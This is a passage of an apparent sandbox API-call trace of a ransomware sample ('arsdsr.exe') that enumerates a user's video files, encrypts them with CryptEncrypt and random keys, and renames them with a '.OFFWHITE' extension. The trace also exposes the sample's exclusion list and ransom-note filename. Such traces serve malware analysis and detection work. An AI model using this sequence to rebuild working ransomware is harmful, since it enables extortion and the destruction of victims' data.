[0136.314] lstrcmpiW (lpString1=".mp4", lpString2=".ttf") returned -1 [0136.314] lstrcmpiW (lpString1=".mp4", lpString2=".mp3") returned 1 [0136.314] lstrcmpiW (lpString1=".mp4", lpString2=".pif") returned -1 [0136.314] lstrcmpiW (lpString1=".mp4", lpString2=".mp4") returned 0 [0136.314] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa91b7880, ftCreationTime.dwHighDateTime=0x1d5e12f, ftLastAccessTime.dwLowDateTime=0x3b5df50, ftLastAccessTime.dwHighDateTime=0x1d5e6a9, ftLastWriteTime.dwLowDateTime=0x3b5df50, ftLastWriteTime.dwHighDateTime=0x1d5e6a9, nFileSizeHigh=0x0, nFileSizeLow=0x64a5, dwReserved0=0x295debc, dwReserved1=0x48e59e2e, cFileName="q_Q2th.mkv", cAlternateFileName="")) returned 1 [0136.314] lstrcmpiW (lpString1="q_Q2th.mkv", lpString2=".") returned 1 [0136.314] lstrcmpiW (lpString1="q_Q2th.mkv", lpString2="..") returned 1 [0136.314] lstrcmpiW (lpString1="q_Q2th.mkv", lpString2="...") returned 1 [0136.314] lstrcmpiW (lpString1="q_Q2th.mkv", lpString2="windows") returned -1 [0136.314] lstrcmpiW (lpString1="q_Q2th.mkv", lpString2="$recycle.bin") returned 1 [0136.314] lstrcmpiW (lpString1="q_Q2th.mkv", lpString2="rsa") returned -1 [0136.314] lstrcmpiW (lpString1="q_Q2th.mkv", lpString2="ntuser.dat") returned 1 [0136.314] lstrcmpiW (lpString1="q_Q2th.mkv", lpString2="programdata") returned 1 [0136.314] lstrcmpiW (lpString1="q_Q2th.mkv", lpString2="appdata") returned 1 [0136.315] lstrcmpiW (lpString1="q_Q2th.mkv", lpString2="program files") returned 1 [0136.315] lstrcmpiW (lpString1="q_Q2th.mkv", lpString2="program files (x86)") returned 1 [0136.315] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" [0136.315] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\", lpString2="q_Q2th.mkv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\q_Q2th.mkv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\q_Q2th.mkv" [0136.315] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.315] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.315] PathFindExtensionW (pszPath="q_Q2th.mkv") returned=".mkv" [0136.315] lstrcmpiW (lpString1=".mkv", lpString2=".exe") returned 1 [0136.315] lstrcmpiW (lpString1=".mkv", lpString2=".log") returned 1 [0136.315] lstrcmpiW (lpString1=".mkv", lpString2=".cab") returned 1 [0136.315] lstrcmpiW (lpString1=".mkv", lpString2=".cmd") returned 1 [0136.315] lstrcmpiW (lpString1=".mkv", lpString2=".com") returned 1 [0136.315] lstrcmpiW (lpString1=".mkv", lpString2=".cpl") returned 1 [0136.315] lstrcmpiW (lpString1=".mkv", lpString2=".ini") returned 1 [0136.315] lstrcmpiW (lpString1=".mkv", lpString2=".dll") returned 1 [0136.315] lstrcmpiW (lpString1=".mkv", lpString2=".url") returned -1 [0136.315] lstrcmpiW (lpString1=".mkv", lpString2=".ttf") returned -1 [0136.315] lstrcmpiW (lpString1=".mkv", lpString2=".mp3") returned -1 [0136.315] lstrcmpiW (lpString1=".mkv", lpString2=".pif") returned -1 [0136.315] lstrcmpiW (lpString1=".mkv", lpString2=".mp4") returned -1 [0136.315] lstrcmpiW (lpString1=".mkv", lpString2=".OFFWHITE") returned -1 [0136.315] lstrcmpiW (lpString1=".mkv", lpString2=".msi") returned -1 [0136.315] lstrcmpiW (lpString1="q_Q2th.mkv", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0136.315] GetProcessHeap () returned 0x500000 [0136.315] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5220d0 [0136.315] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\q_Q2th.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\q_q2th.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0136.316] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=25765) returned 1 [0136.316] GetProcessHeap () returned 0x500000 [0136.316] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0136.316] GetProcessHeap () returned 0x500000 [0136.316] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0136.316] GetProcessHeap () returned 0x500000 [0136.316] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0136.316] GetProcessHeap () returned 0x500000 [0136.316] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0136.316] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.316] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.316] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0136.316] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.316] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.316] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0136.316] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.316] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.316] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295dc90*=0x100) returned 1 [0136.316] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.316] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.316] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0136.317] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x64a5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.317] SetLastError (dwErrCode=0x0) [0136.317] WriteFile (in: hFile=0x21c, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0136.354] GetLastError () returned 0x0 [0136.354] GetLastError () returned 0x0 [0136.354] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x65a5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.354] WriteFile (in: hFile=0x21c, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0136.354] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x66a5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.354] WriteFile (in: hFile=0x21c, lpBuffer=0x5220d0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5220d0*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0136.354] GetProcessHeap () returned 0x500000 [0136.354] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x64a5) returned 0x55a7b8 [0136.354] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.354] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x64a5, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x64a5, lpOverlapped=0x0) returned 1 [0136.356] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.356] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x64a5, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x64a5, lpOverlapped=0x0) returned 1 [0136.356] GetProcessHeap () returned 0x500000 [0136.356] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0136.356] CloseHandle (hObject=0x21c) returned 1 [0136.361] GetProcessHeap () returned 0x500000 [0136.361] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0136.361] GetProcessHeap () returned 0x500000 [0136.361] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0136.361] GetProcessHeap () returned 0x500000 [0136.361] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0136.361] GetProcessHeap () returned 0x500000 [0136.361] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0136.361] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\q_Q2th.mkv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\q_Q2th.mkv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\q_Q2th.mkv" [0136.361] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\q_Q2th.mkv", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\q_Q2th.mkv.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\q_Q2th.mkv.OFFWHITE" [0136.361] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\q_Q2th.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\q_q2th.mkv"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\q_Q2th.mkv.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\q_q2th.mkv.offwhite")) returned 1 [0136.362] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88016470, ftCreationTime.dwHighDateTime=0x1d5dc98, ftLastAccessTime.dwLowDateTime=0x11ebb000, ftLastAccessTime.dwHighDateTime=0x1d5e1d5, ftLastWriteTime.dwLowDateTime=0x11ebb000, ftLastWriteTime.dwHighDateTime=0x1d5e1d5, nFileSizeHigh=0x0, nFileSizeLow=0x10d91, dwReserved0=0x295debc, dwReserved1=0x48e59e2e, cFileName="SREEgmX1fWW-m-.swf", cAlternateFileName="SREEGM~1.SWF")) returned 1 [0136.362] lstrcmpiW (lpString1="SREEgmX1fWW-m-.swf", lpString2=".") returned 1 [0136.362] lstrcmpiW (lpString1="SREEgmX1fWW-m-.swf", lpString2="..") returned 1 [0136.362] lstrcmpiW (lpString1="SREEgmX1fWW-m-.swf", lpString2="...") returned 1 [0136.362] lstrcmpiW (lpString1="SREEgmX1fWW-m-.swf", lpString2="windows") returned -1 [0136.362] lstrcmpiW (lpString1="SREEgmX1fWW-m-.swf", lpString2="$recycle.bin") returned 1 [0136.362] lstrcmpiW (lpString1="SREEgmX1fWW-m-.swf", lpString2="rsa") returned 1 [0136.362] lstrcmpiW (lpString1="SREEgmX1fWW-m-.swf", lpString2="ntuser.dat") returned 1 [0136.362] lstrcmpiW (lpString1="SREEgmX1fWW-m-.swf", lpString2="programdata") returned 1 [0136.362] lstrcmpiW (lpString1="SREEgmX1fWW-m-.swf", lpString2="appdata") returned 1 [0136.362] lstrcmpiW (lpString1="SREEgmX1fWW-m-.swf", lpString2="program files") returned 1 [0136.362] lstrcmpiW (lpString1="SREEgmX1fWW-m-.swf", lpString2="program files (x86)") returned 1 [0136.362] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" [0136.362] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\", lpString2="SREEgmX1fWW-m-.swf" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\SREEgmX1fWW-m-.swf") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\SREEgmX1fWW-m-.swf" [0136.362] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.362] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.362] PathFindExtensionW (pszPath="SREEgmX1fWW-m-.swf") returned=".swf" [0136.362] lstrcmpiW (lpString1=".swf", lpString2=".exe") returned 1 [0136.362] lstrcmpiW (lpString1=".swf", lpString2=".log") returned 1 [0136.362] lstrcmpiW (lpString1=".swf", lpString2=".cab") returned 1 [0136.363] lstrcmpiW (lpString1=".swf", lpString2=".cmd") returned 1 [0136.363] lstrcmpiW (lpString1=".swf", lpString2=".com") returned 1 [0136.363] lstrcmpiW (lpString1=".swf", lpString2=".cpl") returned 1 [0136.363] lstrcmpiW (lpString1=".swf", lpString2=".ini") returned 1 [0136.363] lstrcmpiW (lpString1=".swf", lpString2=".dll") returned 1 [0136.363] lstrcmpiW (lpString1=".swf", lpString2=".url") returned -1 [0136.363] lstrcmpiW (lpString1=".swf", lpString2=".ttf") returned -1 [0136.363] lstrcmpiW (lpString1=".swf", lpString2=".mp3") returned 1 [0136.363] lstrcmpiW (lpString1=".swf", lpString2=".pif") returned 1 [0136.363] lstrcmpiW (lpString1=".swf", lpString2=".mp4") returned 1 [0136.363] lstrcmpiW (lpString1=".swf", lpString2=".OFFWHITE") returned 1 [0136.363] lstrcmpiW (lpString1=".swf", lpString2=".msi") returned 1 [0136.363] lstrcmpiW (lpString1="SREEgmX1fWW-m-.swf", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0136.363] GetProcessHeap () returned 0x500000 [0136.363] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5220e0 [0136.363] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\SREEgmX1fWW-m-.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\sreegmx1fww-m-.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0136.363] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=69009) returned 1 [0136.364] GetProcessHeap () returned 0x500000 [0136.364] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0136.364] GetProcessHeap () returned 0x500000 [0136.364] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0136.364] GetProcessHeap () returned 0x500000 [0136.364] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0136.364] GetProcessHeap () returned 0x500000 [0136.364] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0136.364] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.364] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.364] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0136.364] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.364] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.364] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0136.364] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.364] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.364] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295dc90*=0x100) returned 1 [0136.364] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.364] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.365] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0136.365] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x10d91, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.365] SetLastError (dwErrCode=0x0) [0136.365] WriteFile (in: hFile=0x21c, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0136.367] GetLastError () returned 0x0 [0136.367] GetLastError () returned 0x0 [0136.367] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x10e91, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.367] WriteFile (in: hFile=0x21c, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0136.367] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x10f91, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.367] WriteFile (in: hFile=0x21c, lpBuffer=0x5220e0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5220e0*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0136.367] GetProcessHeap () returned 0x500000 [0136.367] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10d91) returned 0x55a7b8 [0136.367] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.367] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x10d91, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x10d91, lpOverlapped=0x0) returned 1 [0136.371] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.371] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x10d91, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x10d91, lpOverlapped=0x0) returned 1 [0136.371] GetProcessHeap () returned 0x500000 [0136.371] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0136.372] CloseHandle (hObject=0x21c) returned 1 [0136.375] GetProcessHeap () returned 0x500000 [0136.375] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0136.375] GetProcessHeap () returned 0x500000 [0136.375] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0136.375] GetProcessHeap () returned 0x500000 [0136.375] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0136.375] GetProcessHeap () returned 0x500000 [0136.375] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0136.375] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\SREEgmX1fWW-m-.swf" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\SREEgmX1fWW-m-.swf") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\SREEgmX1fWW-m-.swf" [0136.375] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\SREEgmX1fWW-m-.swf", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\SREEgmX1fWW-m-.swf.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\SREEgmX1fWW-m-.swf.OFFWHITE" [0136.375] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\SREEgmX1fWW-m-.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\sreegmx1fww-m-.swf"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\SREEgmX1fWW-m-.swf.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\sreegmx1fww-m-.swf.offwhite")) returned 1 [0136.376] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad57da80, ftCreationTime.dwHighDateTime=0x1d5e691, ftLastAccessTime.dwLowDateTime=0x6bc23390, ftLastAccessTime.dwHighDateTime=0x1d5dab6, ftLastWriteTime.dwLowDateTime=0x6bc23390, ftLastWriteTime.dwHighDateTime=0x1d5dab6, nFileSizeHigh=0x0, nFileSizeLow=0x2de8, dwReserved0=0x295debc, dwReserved1=0x48e59e2e, cFileName="tG5Bhjrzimf4IZXBRRk5.mp4", cAlternateFileName="TG5BHJ~1.MP4")) returned 1 [0136.376] lstrcmpiW (lpString1="tG5Bhjrzimf4IZXBRRk5.mp4", lpString2=".") returned 1 [0136.376] lstrcmpiW (lpString1="tG5Bhjrzimf4IZXBRRk5.mp4", lpString2="..") returned 1 [0136.376] lstrcmpiW (lpString1="tG5Bhjrzimf4IZXBRRk5.mp4", lpString2="...") returned 1 [0136.376] lstrcmpiW (lpString1="tG5Bhjrzimf4IZXBRRk5.mp4", lpString2="windows") returned -1 [0136.376] lstrcmpiW (lpString1="tG5Bhjrzimf4IZXBRRk5.mp4", lpString2="$recycle.bin") returned 1 [0136.376] lstrcmpiW (lpString1="tG5Bhjrzimf4IZXBRRk5.mp4", lpString2="rsa") returned 1 [0136.376] lstrcmpiW (lpString1="tG5Bhjrzimf4IZXBRRk5.mp4", lpString2="ntuser.dat") returned 1 [0136.376] lstrcmpiW (lpString1="tG5Bhjrzimf4IZXBRRk5.mp4", lpString2="programdata") returned 1 [0136.376] lstrcmpiW (lpString1="tG5Bhjrzimf4IZXBRRk5.mp4", lpString2="appdata") returned 1 [0136.376] lstrcmpiW (lpString1="tG5Bhjrzimf4IZXBRRk5.mp4", lpString2="program files") returned 1 [0136.376] lstrcmpiW (lpString1="tG5Bhjrzimf4IZXBRRk5.mp4", lpString2="program files (x86)") returned 1 [0136.376] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" [0136.376] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\", lpString2="tG5Bhjrzimf4IZXBRRk5.mp4" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\tG5Bhjrzimf4IZXBRRk5.mp4") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\tG5Bhjrzimf4IZXBRRk5.mp4" [0136.376] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.376] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.376] PathFindExtensionW (pszPath="tG5Bhjrzimf4IZXBRRk5.mp4") returned=".mp4" [0136.376] lstrcmpiW (lpString1=".mp4", lpString2=".exe") returned 1 [0136.376] lstrcmpiW (lpString1=".mp4", lpString2=".log") returned 1 [0136.376] lstrcmpiW (lpString1=".mp4", lpString2=".cab") returned 1 [0136.376] lstrcmpiW (lpString1=".mp4", lpString2=".cmd") returned 1 [0136.376] lstrcmpiW (lpString1=".mp4", lpString2=".com") returned 1 [0136.376] lstrcmpiW (lpString1=".mp4", lpString2=".cpl") returned 1 [0136.376] lstrcmpiW (lpString1=".mp4", lpString2=".ini") returned 1 [0136.376] lstrcmpiW (lpString1=".mp4", lpString2=".dll") returned 1 [0136.376] lstrcmpiW (lpString1=".mp4", lpString2=".url") returned -1 [0136.377] lstrcmpiW (lpString1=".mp4", lpString2=".ttf") returned -1 [0136.377] lstrcmpiW (lpString1=".mp4", lpString2=".mp3") returned 1 [0136.377] lstrcmpiW (lpString1=".mp4", lpString2=".pif") returned -1 [0136.377] lstrcmpiW (lpString1=".mp4", lpString2=".mp4") returned 0 [0136.377] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabe6e550, ftCreationTime.dwHighDateTime=0x1d5db20, ftLastAccessTime.dwLowDateTime=0x3686b690, ftLastAccessTime.dwHighDateTime=0x1d5dd2e, ftLastWriteTime.dwLowDateTime=0x3686b690, ftLastWriteTime.dwHighDateTime=0x1d5dd2e, nFileSizeHigh=0x0, nFileSizeLow=0x165e1, dwReserved0=0x295debc, dwReserved1=0x48e59e2e, cFileName="uklfuhm_mXhv.avi", cAlternateFileName="UKLFUH~1.AVI")) returned 1 [0136.377] lstrcmpiW (lpString1="uklfuhm_mXhv.avi", lpString2=".") returned 1 [0136.377] lstrcmpiW (lpString1="uklfuhm_mXhv.avi", lpString2="..") returned 1 [0136.377] lstrcmpiW (lpString1="uklfuhm_mXhv.avi", lpString2="...") returned 1 [0136.377] lstrcmpiW (lpString1="uklfuhm_mXhv.avi", lpString2="windows") returned -1 [0136.377] lstrcmpiW (lpString1="uklfuhm_mXhv.avi", lpString2="$recycle.bin") returned 1 [0136.377] lstrcmpiW (lpString1="uklfuhm_mXhv.avi", lpString2="rsa") returned 1 [0136.377] lstrcmpiW 